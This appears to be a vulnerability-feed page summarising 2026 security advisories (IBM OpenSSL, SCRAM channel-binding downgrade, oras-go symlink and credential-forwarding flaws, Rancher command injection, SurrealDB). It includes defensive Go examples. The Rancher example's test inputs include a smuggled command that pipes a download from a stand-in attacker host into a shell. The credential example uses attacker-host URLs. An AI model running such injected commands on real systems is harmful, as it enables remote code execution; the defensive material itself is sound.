
IBM Security Bulletins (added yesterday)

Security Bulletin: Due to the use of OpenSSL, IBM EntireX is vulnerable to multiple vulnerabilities

Summary: Due to the use of OpenSSL, IBM EntireX is vulnerable to multiple vulnerabilities: CVE-2026-7383, CVE-2026-9076, CVE-2026-34180, CVE-2026-34182, CVE-2026-42766, CVE-2026-42770, CVE-2026-45445, CVE-2026-45446, CVE-2026-45447. To address the vulnerabilities, the version of OpenSSL used by IBM...

CVSS 9.1 | AI score 7.9 | EPSS 0.02719
Exploits: 0 | Affected software: 1
GithubExploit (added yesterday)

bugspray

🔴 Bugspray Multi-vector web application vulnerability scann...

AI score 5.8
Exploits: 0
IBM Security Bulletins (added yesterday)

Security Bulletin: IBM MQ for HPE NonStop is affected by vulnerabilities in OpenSSL

Summary: IBM MQ for HPE NonStop is affected by OpenSSL vulnerabilities CVE-2026-28387, CVE-2026-28388, CVE-2026-28389, CVE-2026-28390, CVE-2026-31789, CVE-2026-31790, CVE-2026-2673. Vulnerability Details: CVEID: CVE-2026-28387. DESCRIPTION: Issue summary: An uncommon configuration of clients performi...

CVSS 9.8 | AI score 8 | EPSS 0.00981
Exploits: 0 | Affected software: 1
OSV (added yesterday)

GHSA-P9JG-FCR6-3MHF OnGres SCRAM silent channel-binding authentication downgrade via unsupported certificate algorithms

Summary: A flaw in com.ongres.scram:scram-client allows an attacker capable of performing a TLS man-in-the-middle (MITM) attack to silently downgrade a connection from SCRAM-SHA-256-PLUS (with channel binding) to standard SCRAM-SHA-256 (without channel binding), bypassing strict client-side enforcement...

CVSS 8.2 | AI score 5.8
Exploits: 0 | References: 2
Github Security Blog (added yesterday)

OnGres SCRAM silent channel-binding authentication downgrade via unsupported certificate algorithms

Summary: A flaw in com.ongres.scram:scram-client allows an attacker capable of performing a TLS man-in-the-middle (MITM) attack to silently downgrade a connection from SCRAM-SHA-256-PLUS (with channel binding) to standard SCRAM-SHA-256 (without channel binding), bypassing strict client-side enforcement...

AI score 5.8
Exploits: 0 | References: 2 | Affected software: 2
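The security-relevant point in the two SCRAM entries above is the fail-open behaviour: a client that wants channel binding but cannot compute it for the server's certificate must abort, not quietly continue with plain SCRAM-SHA-256, because a MITM who presents such a certificate would otherwise strip the binding for free. The following is an added Go illustration written for this page; it is not code from scram-client (which is Java), and it assumes the binding type is RFC 5929 tls-server-end-point, whose hash is derived from the certificate's signature algorithm and is undefined for some algorithms (here PureEd25519). The certificates are generated inline as constructed test data.

```go
package main

import (
	"crypto"
	"crypto/ecdsa"
	"crypto/ed25519"
	"crypto/elliptic"
	"crypto/rand"
	_ "crypto/sha256" // registers crypto.SHA256 for Hash.New
	_ "crypto/sha512" // registers crypto.SHA384 and crypto.SHA512
	"crypto/x509"
	"crypto/x509/pkix"
	"errors"
	"fmt"
	"math/big"
	"slices"
	"time"
)

// Mechanism names as advertised on the wire (RFC 7677).
const (
	SCRAMSHA256     = "SCRAM-SHA-256"
	SCRAMSHA256PLUS = "SCRAM-SHA-256-PLUS"
)

// tlsServerEndPoint computes the RFC 5929 tls-server-end-point binding: the DER
// certificate hashed with the hash of its own signature algorithm (MD5 and SHA-1
// are replaced by SHA-256). Algorithms the mapping does not cover, such as
// PureEd25519, return an error rather than a best guess.
func tlsServerEndPoint(cert *x509.Certificate) ([]byte, error) {
	var h crypto.Hash
	switch cert.SignatureAlgorithm {
	case x509.MD5WithRSA, x509.SHA1WithRSA, x509.ECDSAWithSHA1,
		x509.SHA256WithRSA, x509.SHA256WithRSAPSS, x509.ECDSAWithSHA256:
		h = crypto.SHA256
	case x509.SHA384WithRSA, x509.SHA384WithRSAPSS, x509.ECDSAWithSHA384:
		h = crypto.SHA384
	case x509.SHA512WithRSA, x509.SHA512WithRSAPSS, x509.ECDSAWithSHA512:
		h = crypto.SHA512
	default:
		return nil, fmt.Errorf("no tls-server-end-point hash for %v", cert.SignatureAlgorithm)
	}
	d := h.New()
	d.Write(cert.Raw)
	return d.Sum(nil), nil
}

// Selection is the mechanism the client names in its client-first message and
// the channel-binding data it sends (nil when no binding is used).
type Selection struct {
	Mechanism string
	Binding   []byte
}

// selectMechanism is the client-side policy. With requireBinding=true the only
// acceptable outcome is SCRAM-SHA-256-PLUS with a computed binding; a server that
// omits -PLUS, or a certificate the client cannot bind to, aborts the handshake
// instead of silently falling back to plain SCRAM-SHA-256.
func selectMechanism(advertised []string, serverCert *x509.Certificate, requireBinding bool) (Selection, error) {
	binding, bindErr := tlsServerEndPoint(serverCert)
	if slices.Contains(advertised, SCRAMSHA256PLUS) && bindErr == nil {
		return Selection{SCRAMSHA256PLUS, binding}, nil
	}
	if requireBinding {
		if bindErr != nil {
			return Selection{}, fmt.Errorf("channel binding required but unavailable: %w", bindErr)
		}
		return Selection{}, errors.New("channel binding required but server did not offer " + SCRAMSHA256PLUS)
	}
	if slices.Contains(advertised, SCRAMSHA256) {
		return Selection{SCRAMSHA256, nil}, nil
	}
	return Selection{}, errors.New("no mutually supported SCRAM mechanism")
}

func must[T any](v T, err error) T {
	if err != nil {
		panic(err)
	}
	return v
}

// selfSigned makes a throwaway certificate (constructed test data, not a real
// server's); its SignatureAlgorithm follows from the key type.
func selfSigned(key crypto.Signer) *x509.Certificate {
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1),
		Subject:      pkix.Name{CommonName: "db.example.test"},
		NotBefore:    time.Now(),
		NotAfter:     time.Now().Add(time.Hour),
	}
	der := must(x509.CreateCertificate(rand.Reader, tmpl, tmpl, key.Public(), key))
	return must(x509.ParseCertificate(der))
}

// newECDSACert is signed with ECDSA-SHA256 (covered by RFC 5929);
// newEd25519Cert with PureEd25519 (not covered, so binding fails).
func newECDSACert() *x509.Certificate {
	return selfSigned(must(ecdsa.GenerateKey(elliptic.P256(), rand.Reader)))
}

func newEd25519Cert() *x509.Certificate {
	_, key, _ := ed25519.GenerateKey(rand.Reader) // crypto/rand does not fail here
	return selfSigned(key)
}

func main() {
	both := []string{SCRAMSHA256, SCRAMSHA256PLUS}
	for _, c := range []*x509.Certificate{newECDSACert(), newEd25519Cert()} {
		sel, err := selectMechanism(both, c, true)
		fmt.Printf("%v -> mechanism=%q binding=%d bytes err=%v\n", c.SignatureAlgorithm, sel.Mechanism, len(sel.Binding), err)
	}
}
```

The check that matters is the order of the conditions in selectMechanism: the binding error is evaluated before any fallback is considered, so "cannot compute binding" and "server did not offer -PLUS" both terminate the handshake when binding is required. A client that instead treated a binding failure as "binding not available, use the non-PLUS mechanism" is exactly what the advisory describes.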
OSV (added yesterday)

GHSA-8XWF-RJM4-XVHV oras-go has file store write outside workingDir via symlink traversal

The file content store in oras-go attempts to confine writes to workingDir when AllowPathTraversalOnWrite=false, but the guard is lexical and does not account for symlink traversal. If workingDir contains a symlink path component and an attacker-controlled blob title via ocispec.AnnotationTitle...

CVSS 6.9 | AI score 5.7
Exploits: 0 | References: 3
Github Security Blog (added yesterday)

oras-go has file store write outside workingDir via symlink traversal

The file content store in oras-go attempts to confine writes to workingDir when AllowPathTraversalOnWrite=false, but the guard is lexical and does not account for symlink traversal. If workingDir contains a symlink path component and an attacker-controlled blob title via ocispec.AnnotationTitle...

AI score 5.7
Exploits: 0 | References: 3 | Affected software: 1
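The two oras-go file-store entries above describe a guard that reasons about path strings only, which is blind to where a path actually leads once a symlink is involved. The following Go example is added for this page and is not oras-go's code or its fix: it puts a purely lexical containment check beside one that resolves symlinks first, and builds a constructed layout (a store directory containing a symlinked subdirectory that points outside it) to show the lexical check accepting a write that lands outside the directory. Function and field names are this example's own.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// insideLexical is the string-only containment check: it joins and cleans the
// path and rejects anything whose relative form climbs above workingDir. It
// never touches the filesystem, so it cannot see symlinks.
func insideLexical(workingDir, name string) (string, bool) {
	target := filepath.Join(workingDir, name) // Join cleans "." and ".." segments
	rel, err := filepath.Rel(workingDir, target)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return target, false
	}
	return target, true
}

// insideResolved resolves symlinks before deciding. Both workingDir and the
// target's parent directory go through EvalSymlinks (the parent must exist; a
// real writer would create intermediate directories first), and the final
// component may not itself be a symlink. The returned path is the real location
// the write would land in.
func insideResolved(workingDir, name string) (string, error) {
	root, err := filepath.EvalSymlinks(workingDir)
	if err != nil {
		return "", err
	}
	target := filepath.Join(root, name)
	parent, err := filepath.EvalSymlinks(filepath.Dir(target))
	if err != nil {
		return "", err
	}
	real := filepath.Join(parent, filepath.Base(target))
	if fi, err := os.Lstat(real); err == nil && fi.Mode()&os.ModeSymlink != 0 {
		return "", fmt.Errorf("%s is a symlink; refusing to write through it", real)
	}
	if real != root && !strings.HasPrefix(real, root+string(filepath.Separator)) {
		return "", fmt.Errorf("%s resolves outside %s", real, root)
	}
	return real, nil
}

// Verdicts records how each guard judged the constructed inputs.
type Verdicts struct {
	LexicalAcceptsSymlinkEscape  bool // the bug: true
	ResolvedAcceptsSymlinkEscape bool // the fix: false
	ResolvedAcceptsOrdinaryFile  bool // sanity: true
	ResolvedAcceptsDotDot        bool // sanity: false
}

// demo builds a constructed layout: <tmp>/work is the store directory and
// <tmp>/work/sub is a symlink to <tmp>/outside. The blob title "sub/evil.txt"
// stays under work/ lexically but lands in outside/ on disk.
func demo() (Verdicts, error) {
	base, err := os.MkdirTemp("", "symlink-guard-demo")
	if err != nil {
		return Verdicts{}, err
	}
	defer os.RemoveAll(base)
	work := filepath.Join(base, "work")
	outside := filepath.Join(base, "outside")
	for _, d := range []string{work, outside} {
		if err := os.Mkdir(d, 0o755); err != nil {
			return Verdicts{}, err
		}
	}
	if err := os.Symlink(outside, filepath.Join(work, "sub")); err != nil {
		return Verdicts{}, err
	}
	var v Verdicts
	_, v.LexicalAcceptsSymlinkEscape = insideLexical(work, "sub/evil.txt")
	_, err = insideResolved(work, "sub/evil.txt")
	v.ResolvedAcceptsSymlinkEscape = err == nil
	_, err = insideResolved(work, "plain.txt")
	v.ResolvedAcceptsOrdinaryFile = err == nil
	_, err = insideResolved(work, "../escape.txt")
	v.ResolvedAcceptsDotDot = err == nil
	return v, nil
}

func main() {
	v, err := demo()
	fmt.Printf("%+v err=%v\n", v, err)
}
```

Resolving before checking still leaves a window between the check and the write in which a symlink can be swapped in. For a store that must hold up against a concurrent local attacker, open the file relative to the root with an API that refuses to follow symlinks at open time (Go 1.24's os.Root, obtained with os.OpenRoot, does this for Create and OpenFile) rather than re-checking a path string.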
OSV (added yesterday)

GHSA-JXPM-75MH-9FP7 oras-go blob upload vulnerable to credential forwarding via unvalidated Location header

Summary: oras-go follows a registry-controlled Location header during the monolithic blob upload flow and reuses the Authorization header from the initial POST request for the subsequent PUT request. If a malicious registry returns a cross-host Location, oras-go can send the caller's credentials t...

CVSS 7.5 | AI score 5.8
Exploits: 0 | References: 5
Github Security Blog (added yesterday)

oras-go blob upload vulnerable to credential forwarding via unvalidated Location header

Summary: oras-go follows a registry-controlled Location header during the monolithic blob upload flow and reuses the Authorization header from the initial POST request for the subsequent PUT request. If a malicious registry returns a cross-host Location, oras-go can send the caller's credentials t...

AI score 5.8
Exploits: 0 | References: 5 | Affected software: 1
OSV (added yesterday)

GHSA-XF85-363P-868W oras-go: Malicious registry can hijack Bearer token realm to exfiltrate credentials and refresh tokens

Summary: oras-go's auth.Client follows the realm URL from a registry's WWW-Authenticate: Bearer challenge without validating its scheme or host. The realm field is server-controlled by design in the OCI/distribution spec: registries legitimately point token requests at a separate auth endpoint e....

CVSS 2.1 | AI score 5.9
Exploits: 0 | References: 4
Github Security Blog (added yesterday)

oras-go: Malicious registry can hijack Bearer token realm to exfiltrate credentials and refresh tokens

Summary: oras-go's auth.Client follows the realm URL from a registry's WWW-Authenticate: Bearer challenge without validating its scheme or host. The realm field is server-controlled by design in the OCI/distribution spec: registries legitimately point token requests at a separate auth endpoint e....

AI score 5.9
Exploits: 0 | References: 4 | Affected software: 2
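The blob-upload Location entries and the Bearer-realm entries above are the same mistake from the client's side: a URL chosen by the server decides where the client's credentials go next. The Go example below is added for this page and is not oras-go's code or its fix; it shows one policy that serves both cases, with names, the Policy type and the allowlist design being this example's own assumptions. A server-supplied Location or realm is resolved against the request that produced it, and credentials are attached only if the result is https and its host is either the registry the credentials were configured for or an explicitly configured token-service host. Since realms do legitimately live on a different host, that allowlist has to come from client configuration, not from the challenge itself. The responses fed in are constructed.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Simplified Bearer challenge parameter syntax: key="value" pairs with no escaped
// quotes inside values (sufficient for what registries emit).
var paramRE = regexp.MustCompile(`(\w+)="([^"]*)"`)

// parseBearerChallenge extracts realm/service/scope from a WWW-Authenticate value.
func parseBearerChallenge(header string) (map[string]string, error) {
	const prefix = "Bearer "
	if !strings.HasPrefix(header, prefix) {
		return nil, fmt.Errorf("not a Bearer challenge: %q", header)
	}
	params := map[string]string{}
	for _, m := range paramRE.FindAllStringSubmatch(header[len(prefix):], -1) {
		params[strings.ToLower(m[1])] = m[2]
	}
	if params["realm"] == "" {
		return nil, fmt.Errorf("bearer challenge without realm")
	}
	return params, nil
}

// Policy names the registry the credentials were configured for and an explicit
// allowlist of token-service hosts. The allowlist is client-side configuration;
// it must never be learned from the registry's own responses.
type Policy struct {
	Registry  *url.URL
	AuthHosts []string
}

func portOrDefault(u *url.URL) string {
	if p := u.Port(); p != "" {
		return p
	}
	if u.Scheme == "http" {
		return "80"
	}
	return "443"
}

func sameOrigin(a, b *url.URL) bool {
	return a.Scheme == b.Scheme && strings.EqualFold(a.Hostname(), b.Hostname()) && portOrDefault(a) == portOrDefault(b)
}

// credentialTarget resolves a server-supplied Location or realm against the
// request that produced it and returns the URL a credentialed follow-up may go
// to. Non-https targets and hosts that are neither the registry nor an
// allowlisted auth host are refused; the caller may still follow such a URL,
// but only with the Authorization header stripped.
func (p Policy) credentialTarget(base *url.URL, supplied string) (*url.URL, error) {
	ref, err := url.Parse(supplied)
	if err != nil {
		return nil, err
	}
	target := base.ResolveReference(ref)
	if target.Scheme != "https" {
		return nil, fmt.Errorf("refusing to send credentials over %s to %s", target.Scheme, target.Host)
	}
	if sameOrigin(target, p.Registry) {
		return target, nil
	}
	for _, h := range p.AuthHosts {
		if strings.EqualFold(target.Hostname(), h) {
			return target, nil
		}
	}
	return nil, fmt.Errorf("refusing to send registry credentials to foreign host %s", target.Host)
}

// Decision is the outcome for one server-supplied URL: where the follow-up goes
// and whether it may carry the Authorization header.
type Decision struct {
	Target   string
	SendAuth bool
}

func decide(p Policy, base, supplied string) Decision {
	b, err := url.Parse(base)
	if err != nil {
		return Decision{}
	}
	t, err := p.credentialTarget(b, supplied)
	if err != nil {
		return Decision{}
	}
	return Decision{Target: t.String(), SendAuth: true}
}

func main() {
	reg, _ := url.Parse("https://registry.example.test")
	p := Policy{Registry: reg, AuthHosts: []string{"auth.example.test"}}
	upload := "https://registry.example.test/v2/library/app/blobs/uploads/"
	// Constructed responses: same-host relative Location, cross-host Location,
	// https-to-http downgrade, and a challenge whose realm points at an attacker.
	locations := []string{"/v2/library/app/blobs/uploads/1?_state=x", "https://attacker.example/v2/upload", "http://registry.example.test/v2/upload"}
	for _, loc := range locations {
		fmt.Printf("Location %s -> %+v\n", loc, decide(p, upload, loc))
	}
	ch, _ := parseBearerChallenge(`Bearer realm="https://attacker.example/token",service="registry.example.test",scope="repository:library/app:pull"`)
	fmt.Printf("realm %s -> %+v\n", ch["realm"], decide(p, upload, ch["realm"]))
}
```

The scheme check is deliberate: a Location or realm that merely changes https to http on the same host is still a credential leak to anyone on the path, so "same host" alone is not enough.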
GithubExploit (added yesterday)

CVE-PoC-Hub

🔬 CVE-PoC-Hub — Curated Proof-of-Concept Exploits Working,...

AI score 5.8
Exploits: 0
OSV (added yesterday)

GHSA-HHX9-57XQ-R5RW @hey-api/openapi-ts's `buildClientParams` template: prototype chain substitution via unknown `$<slot>___proto__` key

Summary: dist/clients/core/params.ts in @hey-api/openapi-ts ships a runtime template that is copied verbatim into every generated SDK as params.gen.ts. When a caller passes an object argument containing an unknown key starting with a slot prefix ($body, $headers, $path, $query), the function strips...

CVSS 4.8 | AI score 5.9
Exploits: 0 | References: 2
Github Security Blog (added yesterday)

@hey-api/openapi-ts's `buildClientParams` template: prototype chain substitution via unknown `$<slot>___proto__` key

Summary: dist/clients/core/params.ts in @hey-api/openapi-ts ships a runtime template that is copied verbatim into every generated SDK as params.gen.ts. When a caller passes an object argument containing an unknown key starting with a slot prefix ($body, $headers, $path, $query), the function strips...

AI score 5.9
Exploits: 0 | References: 2 | Affected software: 1
EUVD (added yesterday)

EUVD-2026-38009

Rancher vulnerable to command injection through unsanitized YAML parameter...

CVSS 9.4 | AI score 5.8 | EPSS 0.01113
Exploits: 0 | References: 3
OSV (added yesterday)

GHSA-MHC6-2GFQ-XX62 Rancher vulnerable to command injection through unsanitized YAML parameter

Impact: A critical command injection vulnerability has been identified in the Rancher Manager cluster import endpoint /v3/import/tokenclusterId.yaml through unsanitized YAML parameters. This endpoint accepts an authImage query parameter that is rendered without sanitization into a generated...

CVSS 9.6 | AI score 6.2 | EPSS 0.01113
Exploits: 0 | References: 4
Github Security Blog (added yesterday)

Rancher vulnerable to command injection through unsanitized YAML parameter

Impact: A critical command injection vulnerability has been identified in the Rancher Manager cluster import endpoint /v3/import/tokenclusterId.yaml through unsanitized YAML parameters. This endpoint accepts an authImage query parameter that is rendered without sanitization into a generated...

CVSS 9.4 | AI score 6.2 | EPSS 0.01113
Exploits: 0 | References: 4 | Affected software: 1
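The Rancher entries above describe a query parameter that is supposed to name a container image being interpolated, unchecked, into generated output that ends up executed. The value's legitimate alphabet is small and well defined, so the practical defence is to validate it against the image-reference grammar before it reaches any template. The Go example below is added for this page; it is not Rancher's code or its fix, the manifest it renders is a constructed stand-in for whatever the endpoint really generates (the page does not show that), and the regular expression is a deliberately strict subset of the OCI distribution reference grammar, not the full one.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
	"text/template"
)

// imageRefRE: optional registry host (with optional port), lowercase path
// components, optional tag, optional sha256 digest. Whitespace, quotes, ';',
// '$', '`', '|', '&', '(', ')' and newlines are simply not in the alphabet.
var imageRefRE = regexp.MustCompile(
	`^(?:[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*(?::[0-9]{1,5})?/)?` + // registry
		`[a-z0-9]+(?:[._-][a-z0-9]+)*(?:/[a-z0-9]+(?:[._-][a-z0-9]+)*)*` + // path
		`(?::[A-Za-z0-9_][A-Za-z0-9_.-]{0,127})?` + // tag
		`(?:@sha256:[a-f0-9]{64})?$`) // digest

// validateImageRef accepts only strings that are unambiguously image references.
func validateImageRef(ref string) error {
	if len(ref) == 0 || len(ref) > 255 {
		return fmt.Errorf("image reference length %d out of range", len(ref))
	}
	if !imageRefRE.MatchString(ref) {
		return fmt.Errorf("image reference %q does not match the allowed grammar", ref)
	}
	return nil
}

// manifestTmpl is a constructed stand-in for the generated manifest. The
// shell command line is the dangerous spot: an unvalidated value placed there
// is interpreted by the shell, and a newline would also let it inject new YAML keys.
var manifestTmpl = template.Must(template.New("manifest").Parse(
	`apiVersion: batch/v1
kind: Job
spec:
  template:
    spec:
      containers:
      - name: agent
        image: {{.AuthImage}}
        command: ["/bin/sh", "-c", "docker pull {{.AuthImage}}"]
`))

// renderManifest refuses to render until the parameter passes validation.
func renderManifest(authImage string) (string, error) {
	if err := validateImageRef(authImage); err != nil {
		return "", err
	}
	var sb strings.Builder
	if err := manifestTmpl.Execute(&sb, map[string]string{"AuthImage": authImage}); err != nil {
		return "", err
	}
	return sb.String(), nil
}

func main() {
	// Constructed inputs: two legitimate references and a shell-injection attempt.
	for _, in := range []string{"rancher/rancher-agent:v2.9.0", "registry.example.test:5000/ns/agent:latest", "busybox; curl http://attacker.example/x | sh"} {
		out, err := renderManifest(in)
		fmt.Printf("%q -> rendered=%v err=%v\n", in, out != "", err)
	}
}
```

Validation by grammar, rather than by escaping shell metacharacters, is the right shape here because the value is consumed by two different interpreters (the YAML parser and then the shell) and escaping for one does not protect the other.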
OSV (added yesterday)

GHSA-6WQW-VHFR-9999 SurrealDB: Authenticated subscribers can read records hidden by SELECT permissions via LIVE subscriptions

A record user could read records the table's SELECT permission expression should have hidden, when that expression referenced $value, $before, $after, or $event. Binding a chosen value to that name before registering a LIVE SELECT caused notifications to evaluate the permission against the...

CVSS 4.3 | AI score 5.8
Exploits: 0 | References: 4
Github Security Blog (added yesterday)

SurrealDB: Authenticated subscribers can read records hidden by SELECT permissions via LIVE subscriptions

A record user could read records the table's SELECT permission expression should have hidden, when that expression referenced $value, $before, $after, or $event. Binding a chosen value to that name before registering a LIVE SELECT caused notifications to evaluate the permission against the...

AI score 5.8
Exploits: 0 | References: 4 | Affected software: 1
OSV (added yesterday)

GHSA-4V76-CW68-4VC9 SurrealDB: Crafting malicious LIVE queries writes to the database, resulting in DoS, without permission to the table required

A LIVE query whose WHERE clause evaluates to an error caused the source data modifier (the user creating, updating, or deleting a record on the watched table) to fail instead. Calling any arbitrary SurrealQL function with a typed parameter and passing a value of the wrong type, for example LIVE...

CVSS 6.5 | AI score 5.9
Exploits: 0 | References: 4